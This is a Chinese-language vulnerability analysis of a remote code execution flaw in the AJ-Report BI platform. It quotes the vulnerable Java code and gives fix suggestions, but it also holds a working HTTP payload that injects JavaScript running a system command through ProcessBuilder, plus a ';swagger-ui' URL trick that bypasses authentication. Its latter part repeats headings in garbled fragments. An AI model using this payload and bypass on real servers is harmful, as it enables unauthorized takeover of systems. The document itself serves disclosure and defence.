AJ-Report代码执行漏洞分析报告<\/h1>

漏洞概述<\/h2>
AJ-Report是一个全开源的BI平台，在其DataSetParamController中的verification方法存在未过滤参数的问题，导致可以执行JavaScript函数，进而实现远程代码执行。<\/p>

漏洞环境搭建<\/h2>

获取源码：<\/p>

git clone https:\/\/gitee.com\/anji-plus\/report.git
<\/span><\/span><\/code><\/pre><\/li>

配置MySQL数据库：<\/p>

创建数据库：aj_report<\/code><\/li>
导入SQL文件：位于resources\/db.migration<\/code>目录下<\/li>
<\/ul>
<\/li>

配置IDEA开发环境：<\/p>

使用IDEA打开下载的源码<\/li>
<\/ul>
<\/li>

配置文件存储路径<\/p>
<\/li>
<\/ol>
漏洞复现<\/h2>
请求示例<\/h3>
POST \/dataSetParam\/verification;swagger-ui\/ HTTP\/1.1  
<\/span><\/span><\/span>Host: 192.168.0.100:9095  
<\/span><\/span><\/span>Content-Type: application\/json;charset=UTF-8  
<\/span><\/span><\/span>Connection: close  
<\/span><\/span><\/span>
<\/span><\/span><\/span>{
<\/span><\/span><\/span>  "sampleItem":"1",
<\/span><\/span><\/span>  "validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\\"whoami\\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"
<\/span><\/span><\/span>}
<\/span><\/span><\/span><\/code><\/pre>关键点<\/h3>

通过validationRules<\/code>参数注入恶意JavaScript代码<\/li>
使用;swagger-ui\/<\/code>绕过权限验证<\/li>
<\/ul>
漏洞分析<\/h2>
漏洞路径<\/h3>
\report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java<\/code><\/p>
漏洞代码<\/h3>
@PostMapping<\/span>(<\/span>"\/verification"<\/span>)<\/span>  
<\/span><\/span>public<\/span> ResponseBean verification<\/span>(<\/span>@Validated<\/span> @RequestBody<\/span> DataSetParamValidationParam param)<\/span> {<\/span>  
<\/span><\/span>    DataSetParamDto dto =<\/span> new<\/span> DataSetParamDto();<\/span>  
<\/span><\/span>    dto.<\/span>setSampleItem<\/span>(<\/span>param.<\/span>getSampleItem<\/span>());<\/span>  
<\/span><\/span>    dto.<\/span>setValidationRules<\/span>(<\/span>param.<\/span>getValidationRules<\/span>());<\/span>  
<\/span><\/span>    return<\/span> responseSuccessWithData(<\/span>dataSetParamService.<\/span>verification<\/span>(<\/span>dto));<\/span>  
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>参数接收类<\/h3>
@Data<\/span>  
<\/span><\/span>public<\/span> class<\/span> DataSetParamValidationParam<\/span> implements<\/span> Serializable {<\/span>  
<\/span><\/span>    @NotBlank<\/span>(<\/span>message =<\/span> "sampleItem not empty"<\/span>)<\/span>  
<\/span><\/span>    private<\/span> String sampleItem;<\/span>  
<\/span><\/span>    
<\/span><\/span>    @NotBlank<\/span>(<\/span>message =<\/span> "validationRules not empty"<\/span>)<\/span>  
<\/span><\/span>    private<\/span> String validationRules;<\/span>  
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>服务层实现<\/h3>
位于DataSetParamServiceImpl.java<\/code>中的关键方法：<\/p>
@Override<\/span>
<\/span><\/span>public<\/span> Object verification<\/span>(<\/span>DataSetParamDto dataSetParamDto)<\/span> {<\/span>
<\/span><\/span>    String validationRules =<\/span> dataSetParamDto.<\/span>getValidationRules<\/span>();<\/span>
<\/span><\/span>    if<\/span> (<\/span>StringUtils.<\/span>isNotBlank<\/span>(<\/span>validationRules))<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            engine.<\/span>eval<\/span>(<\/span>validationRules);<\/span>  \/\/ 执行JavaScript代码
<\/span><\/span><\/span><\/span>            if<\/span>(<\/span>engine instanceof<\/span> Invocable){<\/span>
<\/span><\/span>                Invocable invocable =<\/span> (<\/span>Invocable)<\/span> engine;<\/span>
<\/span><\/span>                Object exec =<\/span> invocable.<\/span>invokeFunction<\/span>(<\/span>"verification"<\/span>,<\/span> dataSetParamDto);<\/span>
<\/span><\/span>                ObjectMapper objectMapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>                if<\/span> (<\/span>exec instanceof<\/span> Boolean)<\/span> {<\/span>
<\/span><\/span>                    return<\/span> objectMapper.<\/span>convertValue<\/span>(<\/span>exec,<\/span> Boolean.<\/span>class<\/span>);<\/span>
<\/span><\/span>                }<\/span>else<\/span> {<\/span>
<\/span><\/span>                    return<\/span> objectMapper.<\/span>convertValue<\/span>(<\/span>exec,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> BusinessExceptionBuilder.<\/span>build<\/span>(<\/span>ResponseCode.<\/span>EXECUTE_JS_ERROR<\/span>,<\/span> ex.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> true<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JavaScript引擎初始化<\/h3>
private<\/span> ScriptEngine engine;<\/span>
<\/span><\/span>{<\/span>
<\/span><\/span>    ScriptEngineManager manager =<\/span> new<\/span> ScriptEngineManager();<\/span>
<\/span><\/span>    engine =<\/span> manager.<\/span>getEngineByName<\/span>(<\/span>"JavaScript"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>权限绕过分析<\/h2>
正常访问限制<\/h3>
正常情况下访问\/dataSetParam\/verification<\/code>路由需要token验证<\/p>
绕过方法<\/h3>
在TokenFilter.java<\/code>中，放行了swagger-ui和swagger-resources：<\/p>
if<\/span> (<\/span>uri.<\/span>contains<\/span>(<\/span>"swagger-ui"<\/span>)<\/span> ||<\/span> uri.<\/span>contains<\/span>(<\/span>"swagger-resources"<\/span>))<\/span> {<\/span>  
<\/span><\/span>    filterChain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>  
<\/span><\/span>    return<\/span>;<\/span>  
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方式<\/h3>
使用URL截断;<\/code>绕过鉴权：<\/p>
POST \/dataSetParam\/verification;swagger-ui HTTP\/1.1  
POST \/dataSetParam\/verification;swagger-resources HTTP\/1.1
<\/code><\/pre>
漏洞原理总结<\/h2>

verification<\/code>方法接收validationRules<\/code>参数并直接传递给JavaScript引擎执行<\/li>
攻击者可以构造恶意的JavaScript代码，通过Java反射机制执行系统命令<\/li>
使用;<\/code>URL截断技术绕过权限验证<\/li>
漏洞的根本原因是未对用户输入的JavaScript代码进行任何过滤或沙箱限制<\/li>
<\/ol>
修复建议<\/h2>

对validationRules<\/code>参数进行严格过滤，禁止危险函数和Java反射调用<\/li>
实现JavaScript沙箱环境，限制可访问的Java类和函数<\/li>
修改权限验证逻辑，避免使用简单的URI包含判断<\/li>
对;<\/code>等特殊字符进行规范化处理，防止URL截断攻击<\/li>
<\/ol>

AJ-Report代码执行漏洞分析报告<\/h1>

漏洞概述<\/h2>
AJ-Report是一个全开源的BI平台，在其DataSetParamController中的verification方法存在未过滤参数的问题，导致可以执行JavaScript函数，进而实现远程代码执行。<\/p>

漏洞复现<\/h2>

漏洞分析<\/h2>

漏洞路径<\/h3>
`\report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java<\/code><\/p>`

权限绕过分析<\/h2>

正常访问限制<\/h3>
正常情况下访问`\/dataSetParam\/verification<\/code>路由需要token验证<\/p>`

AJ-Report代码执行漏洞分析报告<\/h1>

漏洞概述<\/h2> AJ-Report是一个全开源的BI平台，在其DataSetParamController中的verification方法存在未过滤参数的问题，导致可以执行JavaScript函数，进而实现远程代码执行。<\/p>

漏洞复现<\/h2>

漏洞分析<\/h2>

漏洞路径<\/h3> \report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java<\/code><\/p>

权限绕过分析<\/h2>

正常访问限制<\/h3> 正常情况下访问\/dataSetParam\/verification<\/code>路由需要token验证<\/p>

漏洞概述<\/h2>
AJ-Report是一个全开源的BI平台，在其DataSetParamController中的verification方法存在未过滤参数的问题，导致可以执行JavaScript函数，进而实现远程代码执行。<\/p>

漏洞路径<\/h3>
`\report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java<\/code><\/p>`

正常访问限制<\/h3>
正常情况下访问`\/dataSetParam\/verification<\/code>路由需要token验证<\/p>`